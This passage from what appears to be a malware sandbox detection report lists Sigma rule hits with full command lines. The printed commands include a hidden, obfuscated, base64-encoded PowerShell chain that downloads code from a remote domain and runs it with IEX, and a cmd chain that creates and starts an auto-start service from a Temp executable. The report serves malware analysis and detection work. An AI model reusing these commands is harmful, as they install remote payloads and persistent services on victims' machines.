AHkAcABlACIAOwANAAoAIAAgACAAIAAkAHYAYQBsAHUAZQAgAD0AIAAiAGEAcABwAGwAaQBjAGEAdABpAG8AbgAvAGoAcwBvAG4AIgA7AA0ACgANAAoAIAAgACAAIAAkAGgAZQBhAGQAZQByAHMAWwAkAGsAZQB5AF0AIAA9ACAAJAB2AGEAbAB1AGUAOwANAAoAIAAgACAAIAAkAHUAcgBpACAAPQAgACIATABPAEcAVQBSAEwAIgA7AA0ACgAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABiAG8AZAB5ACAAPQAgACQAbABvAGcATQBlAHMAcwBhAGcAZQBzACAAfAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJAB1AHIAaQAgAC0ATQBlAHQAaABvAGQAIABQAG8AcwB0ACAALQBIAGUAYQBkAGUAcgBzACAAJABoAGUAYQBkAGUAcgBzACAALQBCAG8AZAB5ACAAJABiAG8AZAB5AA0ACgAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAGMAYQB0AGMAaAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAADQAKAH0ADQAKAA0ACgB3AGgAaQBsAGUAKAAkAGMAbwB1AG4AdAAgAC0AZwB0ACAAMAApAA0ACgB7AA0ACgAJAA0ACgAJAHQAcgB5AHsADQAKACAAIAAgACAAIAAgACAAIABTAGUAbgBkACAAIgBiAGUAZwBpAG4AIABkAG8AdwBuAGwAbwBhAGQAIAAkAHUAcgBpACIAOwANAAoACQAJACQAYwBvAG4AdABlAG4AdAAgAD0AIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJAB1AHIAaQAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcAOwANAAoAIAAgACAAIAAgACAAIAAgACQAYgB5AHQAZQBBAHIAcgBhAHkAIAA9ACAAJABjAG8AbgB0AGUAbgB0AC4AYwBvAG4AdABlAG4AdAA7AA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAIAAoACQAaQAgAD0AIAAwADsAIAAkAGkAIAAtAGwAdAAgACQAYgB5AHQAZQB
        Sigma detected: Suspicious New Service Creation
        Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: SC CREATE "myRdpService" binpath= "C:\Windows\Temp\myRdpService.exe cakoi10" start= auto , CommandLine: SC CREATE "myRdpService" binpath= "C:\Windows\Temp\myRdpService.exe cakoi10" start= auto , CommandLine|base64offset|contains: H, Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: "cmd.exe" /c sc delete "myRdpService" & SC CREATE "myRdpService" binpath= "C:\Windows\Temp\myRdpService.exe cakoi10" start= auto & net start "myRdpService", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 980, ParentProcessName: cmd.exe, ProcessCommandLine: SC CREATE "myRdpService" binpath= "C:\Windows\Temp\myRdpService.exe cakoi10" start= auto , ProcessId: 1932, ProcessName: sc.exe
        Sigma detected: Suspicious PowerShell Encoded Command Patterns
        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell.exe -WindowStyle hidden -NoLogo -NoProfile -ExecutionPolicy bypass -EncodedCommand JAB1AHIAaQAgAD0AIAAiAGgAdAB0AHAAcwA6AC8ALwB1AHkAdAAxAG4AOABkAGUAZAA5AGYAYgAzADgAMAAuAGMAbwBtAC8AZgBpAGwAZQAyAC8AMABmAGQAYQBhADAAMwA4AGEAZAA2AGMAMgBlAGUAYQA0ADUAMQAwADIAZQA3AGMAYQA5AGYAYQA0ADEANgA3ADgANQA4AGUAZgBlADkAZAA3ADkAOQA1AGYAMABjAGYANAAyAGYAMQBkAGEAOAAwADkAMAA0ADAAMgBjAGUAZgBjADIANQA1ADQAZABkAGQAYQBjAGQAMAAyAGEAYgBjADcAZgA5ADEAZABhADYANwA1ADEAYwBjAGMAZQA5ADAAZABkADQAOAA4ADcAYgAxADEANgA0ADUANQBlADQAOQBiAGUAOAAxAGQAYgAxADAAZgA4ADAAYgBhAGEAMQAxAGEANAAyADQAZgAwADAANQBkADYAZABiAGQAYQBkADcANQA0ADgANwA2AGQANQA5AGUANQBmADQANgAwAGIAMQBjADQAZgBmAGIAYQA5AGMAZABkADEAYQA0AGMAMwA5ADcAMAA1ADUAYQAwADIAOABlADAAMgA2ADIAMQBlADYAZAA0AGMAZQAxADQANABlADAAZgBlADgAMQA4AGIANwAwAGUANgAyADEAYwA5AGYANABmADgANwA2ADcAOQAxACIAOwANAAoAJABjAG8AdQBuAHQAIAA9ACAAMQAwADAAOwANAAoADQAKAA0ACgANAAoAZgB1AG4AYwB0AGkAbwBuACAAUwBlAG4AZAAgAHsADQAKACAAIAAgACAAcABhAHIAYQBtACgAIABbAFAAUwBPAGIAagBlAGMAdABdACAAJABsAG8AZwBNAHMAZwAgACkADQAKAA0ACgAgACAAIAAgACMAIABDAG8AbgB2AGUAcgB0ACAAYgBvAGQAeQAgAHQAbwAgAHMAdAByAGkAbgBnAA0ACgAgACAAIAAgACQAcwB0AHIAaQBuAGcAQgBvAGQAeQAgAD0AIABbAHMAdAByAGkAbgBnAF0AKAAkAGwAbwBnAE0AcwBnACAAfAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgApADsADQAKACAAIAAgACAAJABsAG8AZwBNAGUAcwBzAGEAZwBlAHMAIAA9ACAAQAAoACkAOwANAAoAIAAgACAAIAAkAGwAbwBnAE0AZQBzAHMAYQBnAGUAcwAgACsAPQAgACQAcwB0AHIAaQBuAGcAQgBvAGQAeQA7AA0ACgAgACAAIAAgACQAbABvAGcATQBlAHMAcwBhAGcAZQBzACAAKwA9ACAAIgAtAC0ALQAtAC0ALQAtAC0ALQAtACIAOwANAAoADQAKACAAIAAgACAAJABoAGUAYQBkAGUAcgBzACAAPQAgAEAAewB9ADsADQAKACAAIAAgACAAJABrAGUAeQAgAD0AIAAiAEMAbwBuAHQAZQBuAHQALQBUAHkAcABlACIAOwANAAoAIAAgACAAIAAkAHYAYQBsAHUAZQAgAD0AIAAiAGEAcABwAGwAaQBjAGEAdABpAG8AbgAvAGoAcwBvAG4AIgA7AA0ACgANAAoAIAAgACAAIAAkAGgAZQBhAGQAZQByAHMAWwAkAGsAZQB5AF0AIAA9ACAAJAB2AGEAbAB1AGUAOwANAAoAIAAgACAAIAAkAHUAcgBpACAAPQAgACIATABPAEcAVQBSAEwAIgA7AA0ACgAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABiAG8AZAB5ACAAPQAgACQAbABvAGcATQBlAHMAcwBhAGcAZQBzACAAfAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJAB1AHIAaQAgAC0ATQBlAHQAaABvAGQAIABQAG8AcwB0ACAALQBIAGUAYQBkAGUAcgBzACAAJABoAGUAYQBkAGUAcgBzACAALQBCAG8AZAB5ACAAJABiAG8AZAB5AA0ACgAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAGMAYQB0AGMAaAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAADQAKAH0ADQAKAA0ACgB3AGgAaQBsAGUAKAAkAGMAbwB1AG4AdAAgAC0AZwB0ACAAMAApAA0ACgB7AA0ACgAJAA0ACgAJAHQAcgB5AHsADQAKACAAIAAgACAAIAAgACAAIABTAGUAbgBkACAAIgBiAGUAZwBpAG4AIABkAG8AdwBuAGwAbwBhAGQAIAAkAHUAcgBpACIAOwANAAoACQAJACQAYwBvAG4AdABlAG4AdAAgAD0AIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJAB1AHIAaQAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcAOwANAAoAIAAgACAAIAAgACAAIAAgACQAYgB5AHQAZQBBAHIAcgBhAHkAIAA9ACAAJABjAG8AbgB0AGUAbgB0AC4AYwBvAG4AdABlAG4AdAA7AA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAIAAoACQAaQAgAD0AIAAwADsAIAAkAGkAIAAtAGwAdAAgACQAYgB5AHQAZQB
        Sigma detected: Suspicious PowerShell Parameter Substring
        Source: Process startedAuthor: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix): Data: Command: PoWersHeLl -W HiDden -NolOGO -Nop -ep BYPAsS -eNcoDedcOmMAnd "SQBFAFgAIAAoAFsAVABFAFgAdAAuAEUAbgBDAG8AZABpAE4ARwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AFIAaQBuAGcAKAAoAGkAdwByACAAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIAYQBIAFIAMABjAEgATQA2AEwAeQA5ADEAZQBYAFEAeABiAGoAaABrAFoAVwBRADUAWgBtAEkAegBPAEQAQQB1AFkAMgA5AHQATAAwAHQAUgAiACkAKQApACkALgBDAG8ATgBUAGUATgB0ACkAKQA=" , CommandLine: PoWersHeLl -W HiDden -NolOGO -Nop -ep BYPAsS -eNcoDedcOmMAnd "SQBFAFgAIAAoAFsAVABFAFgAdAAuAEUAbgBDAG8AZABpAE4ARwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AFIAaQBuAGcAKAAoAGkAdwByACAAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIAYQBIAFIAMABjAEgATQA2AEwAeQA5ADEAZQBYAFEAeABiAGoAaABrAFoAVwBRADUAWgBtAEkAegBPAEQAQQB1AFkAMgA5AHQATAAwAHQAUgAiACkAKQApACkALgBDAG8ATgBUAGUATgB0ACkAKQA=" , CommandLine|base64offset|contains: >., Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\system32\cmd.exe" /v /k "S^T^aR^T /M^I^n "" P^oWer^s^H^eL^l -W H^iDde^n -No^l^OGO -N^o^p -ep B^YPA^sS -eN^c^oDe^d^cOmMAn^d "SQBFAFgAIAAoAFsAVABFAFgAdAAuAEUAbgBDAG8AZABpAE4ARwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AFIAaQBuAGcAKAAoAGkAdwByACAAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIAYQBIAFIAMABjAEgATQA2AEwAeQA5ADEAZQBYAFEAeABiAGoAaABrAFoAVwBRADUAWgBtAEkAegBPAEQAQQB1AFkAMgA5AHQATAAwAHQAUgAiACkAKQApACkALgBDAG8ATgBUAGUATgB0ACkAKQA="" && exit, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 3200, ParentProcessName: cmd.exe, ProcessCommandLine: PoWersHeLl -W HiDden -NolOGO -Nop -ep BYPAsS -eNcoDedcOmMAnd "SQBFAFgAIAAoAFsAVABFAFgAdAAuAEUAbgBDAG8AZABpAE4ARwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AFIAaQBuAGcAKAAoAGkAdwByACAAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIAYQBIAFIAMABjAEgATQA2AEwAeQA5ADEAZQBYAFEAeABiAGoAaABrAFoAVwBRADUAWgBtAEkAegBPAEQAQQB1AFkAMgA5AHQATAAwAHQAUgAiACkAKQApACkALgBDAG8ATgBUAGUATgB0ACkAKQA=" , ProcessId: 2012, ProcessName: powershell.exe
        Sigma detected: Change PowerShell Policies to an Insecure Level
        Source: Process startedAuthor: frack113: Data: Command: PoWersHeLl -W HiDden -NolOGO -Nop -ep BYPAsS -eNcoDedcOmMAnd "SQBFAFgAIAAoAFsAVABFAFgAdAAuAEUAbgBDAG8AZABpAE4ARwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AFIAaQBuAGcAKAAoAGkAdwByACAAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIAYQBIAFIAMABjAEgATQA2AEwAeQA5ADEAZQBYAFEAeABiAGoAaABrAFoAVwBRADUAWgBtAEkAegBPAEQAQQB1AFkAMgA5AHQATAAwAHQAUgAiACkAKQApACkALgBDAG8ATgBUAGUATgB0ACkAKQA=" , CommandLine: PoWersHeLl -W HiDden -NolOGO -Nop -ep BYPAsS -eNcoDedcOmMAnd "SQBFAFgAIAAoAFsAVABFAFgAdAAuAEUAbgBDAG8AZABpAE4ARwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AFIAaQBuAGcAKAAoAGkAdwByACAAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIAYQBIAFIAMABjAEgATQA2AEwAeQA5ADEAZQBYAFEAeABiAGoAaABrAFoAVwBRADUAWgBtAEkAegBPAEQAQQB1AFkAMgA5AHQATAAwAHQAUgAiACkAKQApACkALgBDAG8ATgBUAGUATgB0ACkAKQA=" , CommandLine|base64offset|contains: >., Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\system32\cmd.exe" /v /k "S^T^aR^T /M^I^n "" P^oWer^s^H^eL^l -W H^iDde^n -No^l^OGO -N^o^p -ep B^YPA^sS -eN^c^oDe^d^cOmMAn^d "SQBFAFgAIAAoAFsAVABFAFgAdAAuAEUAbgBDAG8AZABpAE4ARwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AFIAaQBuAGcAKAAoAGkAdwByACAAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIAYQBIAFIAMABjAEgATQA2AEwAeQA5ADEAZQBYAFEAeABiAGoAaABrAFoAVwBRADUAWgBtAEkAegBPAEQAQQB1AFkAMgA5AHQATAAwAHQAUgAiACkAKQApACkALgBDAG8ATgBUAGUATgB0ACkAKQA="" && exit, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 3200, ParentProcessName: cmd.exe, ProcessCommandLine: PoWersHeLl -W HiDden -NolOGO -Nop -ep BYPAsS -eNcoDedcOmMAnd "SQBFAFgAIAAoAFsAVABFAFgAdAAuAEUAbgBDAG8AZABpAE4ARwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AFIAaQBuAGcAKAAoAGkAdwByACAAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIAYQBIAFIAMABjAEgATQA2AEwAeQA5ADEAZQBYAFEAeABiAGoAaABrAFoAVwBRADUAWgBtAEkAegBPAEQAQQB1AFkAMgA5AHQATAAwAHQAUgAiACkAKQApACkALgBDAG8ATgBUAGUATgB0ACkAKQA=" , ProcessId: 2012, ProcessName: powershell.exe
        Sigma detected: Dynamic .NET Compilation Via Csc.EXE
        Source: Process startedAuthor: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\vz2enilj\vz2enilj.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\vz2enilj\vz2enilj.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: PoWersHeLl -W HiDden -NolOGO -Nop -ep BYPAsS -eNcoDedcOmMAnd "SQBFAFgAIAAoAFsAVABFAFgAdAAuAEUAbgBDAG8AZABpAE4ARwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AFIAaQBuAGcAKAAoAGkAdwByACAAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIAYQBIAFIAMABjAEgATQA2AEwAeQA5ADEAZQBYAFEAeABiAGoAaABrAFoAVwBRADUAWgBtAEkAegBPAEQAQQB1AFkAMgA5AHQATAAwAHQAUgAiACkAKQApACkALgBDAG8ATgBUAGUATgB0ACkAKQA=" , ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 2012, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\vz2enilj\vz2enilj.cmdline", ProcessId: 6236, ProcessName: csc.exe
        Sigma detected: Suspicious Execution of Powershell with Base64
        Source: Process startedAuthor: frack113: Data: Command: PoWersHeLl -W HiDden -NolOGO -Nop -ep BYPAsS -eNcoDedcOmMAnd "SQBFAFgAIAAoAFsAVABFAFgAdAAuAEUAbgBDAG8AZABpAE4ARwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AFIAaQBuAGcAKAAoAGkAdwByACAAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIAYQBIAFIAMABjAEgATQA2AEwAeQA5ADEAZQBYAFEAeABiAGoAaABrAFoAVwBRADUAWgBtAEkAegBPAEQAQQB1AFkAMgA5AHQATAAwAHQAUgAiACkAKQApACkALgBDAG8ATgBUAGUATgB0ACkAKQA=" , CommandLine: PoWersHeLl -W HiDden -NolOGO -Nop -ep BYPAsS -eNcoDedcOmMAnd "SQBFAFgAIAAoAFsAVABFAFgAdAAuAEUAbgBDAG8AZABpAE4ARwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AFIAaQBuAGcAKAAoAGkAdwByACAAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIAYQBIAFIAMABjAEgATQA2AEwAeQA5ADEAZQBYAFEAeABiAGoAaABrAFoAVwBRADUAWgBtAEkAegBPAEQAQQB1AFkAMgA5AHQATAAwAHQAUgAiACkAKQApACkALgBDAG8ATgBUAGUATgB0ACkAKQA=" , CommandLine|base64offset|contains: >., Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\system32\cmd.exe" /v /k "S^T^aR^T /M^I^n "" P^oWer^s^H^eL^l -W H^iDde^n -No^l^OGO -N^o^p -ep B^YPA^sS -eN^c^oDe^d^cOmMAn^d "SQBFAFgAIAAoAFsAVABFAFgAdAAuAEUAbgBDAG8AZABpAE4ARwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AFIAaQBuAGcAKAAoAGkAdwByACAAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIAYQBIAFIAMABjAEgATQA2AEwAeQA5ADEAZQBYAFEAeABiAGoAaABrAFoAVwBRADUAWgBtAEkAegBPAEQAQQB1AFkAMgA5AHQATAAwAHQAUgAiACkAKQApACkALgBDAG8ATgBUAGUATgB0ACkAKQA="" && exit, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 3200, ParentProcessName: cmd.exe, ProcessCommandLine: PoWersHeLl -W HiDden -NolOGO -Nop -ep BYPAsS -eNcoDedcOmMAnd "SQBFAFgAIAAoAFsAVABFAFgAdAAuAEUAbgBDAG8AZABpAE4ARwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AFIAaQBuAGcAKAAoAGkAdwByACAAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIAYQBIAFIAMABjAEgATQA2AEwAeQA5ADEAZQBYAFEAeABiAGoAaABrAFoAVwBRADUAWgBtAEkAegBPAEQAQQB1AFkAMgA5AHQATAAwAHQAUgAiACkAKQApACkALgBDAG8ATgBUAGUATgB0ACkAKQA=" , ProcessId: 2012, ProcessName: powershell.exe
        Sigma detected: Suspicious PowerShell Invocations - Specific - ProcessCreation
        Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: PoWersHeLl -W HiDden -NolOGO -Nop -ep BYPAsS -eNcoDedcOmMAnd "SQBFAFgAIAAoAFsAVABFAFgAdAAuAEUAbgBDAG8AZABpAE4ARwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AFIAaQBuAGcAKAAoAGkAdwByACAAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIAYQBIAFIAMABjAEgATQA2AEwAeQA5ADEAZQBYAFEAeABiAGoAaABrAFoAVwBRADUAWgBtAEkAegBPAEQAQQB1AFkAMgA5AHQATAAwAHQAUgAiACkAKQApACkALgBDAG8ATgBUAGUATgB0ACkAKQA=" , CommandLine: PoWersHeLl -W HiDden -NolOGO -Nop -ep BYPAsS -eNcoDedcOmMAnd "SQBFAFgAIAAoAFsAVABFAFgAdAAuAEUAbgBDAG8AZABpAE4ARwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AFIAaQBuAGcAKAAoAGkAdwByACAAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIAYQBIAFIAMABjAEgATQA2AEwAeQA5ADEAZQBYAFEAeABiAGoAaABrAFoAVwBRADUAWgBtAEkAegBPAEQAQQB1AFkAMgA5AHQATAAwAHQAUgAiACkAKQApACkALgBDAG8ATgBUAGUATgB0ACkAKQA=" , CommandLine|base64offset|contains: >., Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\system32\cmd.exe" /v /k "S^T^aR^T /M^I^n "" P^oWer^s^H^eL^l -W H^iDde^n -No^l^OGO -N^o^p -ep B^YPA^sS -eN^c^oDe^d^cOmMAn^d "SQBFAFgAIAAoAFsAVABFAFgAdAAuAEUAbgBDAG8AZABpAE4ARwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AFIAaQBuAGcAKAAoAGkAdwByACAAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIAYQBIAFIAMABjAEgATQA2AEwAeQA5ADEAZQBYAFEAeABiAGoAaABrAFoAVwBRADUAWgBtAEkAegBPAEQAQQB1AFkAMgA5AHQATAAwAHQAUgAiACkAKQApACkALgBDAG8ATgBUAGUATgB0ACkAKQA="" && exit, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 3200, ParentProcessName: cmd.exe, ProcessCommandLine: PoWersHeLl -W HiDden -NolOGO -Nop -ep BYPAsS -eNcoDedcOmMAnd "SQBFAFgAIAAoAFsAVABFAFgAdAAuAEUAbgBDAG8AZABpAE4ARwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AFIAaQBuAGcAKAAoAGkAdwByACAAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIAYQBIAFIAMABjAEgATQA2AEwAeQA5ADEAZQBYAFEAeABiAGoAaABrAFoAVwBRADUAWgBtAEkAegBPAEQAQQB1AFkAMgA5AHQATAAwAHQAUgAiACkAKQApACkALgBDAG8ATgBUAGUATgB0ACkAKQA=" , ProcessId: 2012, ProcessName: powershell.exe
        Sigma detected: Dynamic CSharp Compile Artefact
        Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 2012, TargetFilename: C:\Users\user\AppData\Local\Temp\vz2enilj\vz2enilj.cmdline
        Sigma detected: Net.exe Execution
        Source: Process startedAuthor: Michael Haag, Mark Woan (improvements), James Pemberton / @4A616D6573 / oscd.community (improvements): Data: Command: net start "myRdpService", CommandLine: net start "myRdpService", CommandLine|base64offset|contains: , Image: C:\Windows\System32\net.exe, NewProcessName: C:\Windows\System32\net.exe, OriginalFileName: C:\Windows\System32\net.exe, ParentCommandLine: "cmd.exe" /c sc delete "myRdpService" & SC CREATE "myRdpService" binpath= "C:\Windows\Temp\myRdpService.exe cakoi10" start= auto & net start "myRdpService", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 980, ParentProcessName: cmd.exe, ProcessCommandLine: net start "myRdpService", ProcessId: 1804, ProcessName: net.exe
        Sigma detected: New Service Creation Using Sc.EXE
